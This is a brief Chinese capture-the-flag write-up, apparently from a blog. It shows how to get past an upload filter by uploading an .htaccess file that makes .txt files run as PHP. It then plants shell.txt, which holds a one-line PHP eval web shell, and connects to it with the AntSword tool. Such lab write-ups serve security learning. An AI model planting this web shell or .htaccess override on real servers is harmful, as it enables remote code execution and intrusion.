文章目录
使用工具
- Microsoft Edge v84.0.522.40
- 中国蚁剑
.htaccess文件
.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。
——百度百科
通过编辑.htaccess文件将特定后缀的文件解析为PHP执行
解题过程
直接上传PHP文件无法上传,题目提示.htaccess文件
首先新建txt文件,写入以下代码
#将txt文件解析为PHP文件执行
AddType application/x-httpd-php .txt
将该.txt文件更改后缀为.htaccess,上传
再新建一个shell.txt,写入PHP代码
<?php
echo "PHP Loaded";
eval(@$_POST['a']);
?>
上传成功,访问/upload/shell.txt
成功
使用蚁剑访问得到FLAG
注意URL地址和密码
完
欢迎在评论区留言
感谢浏览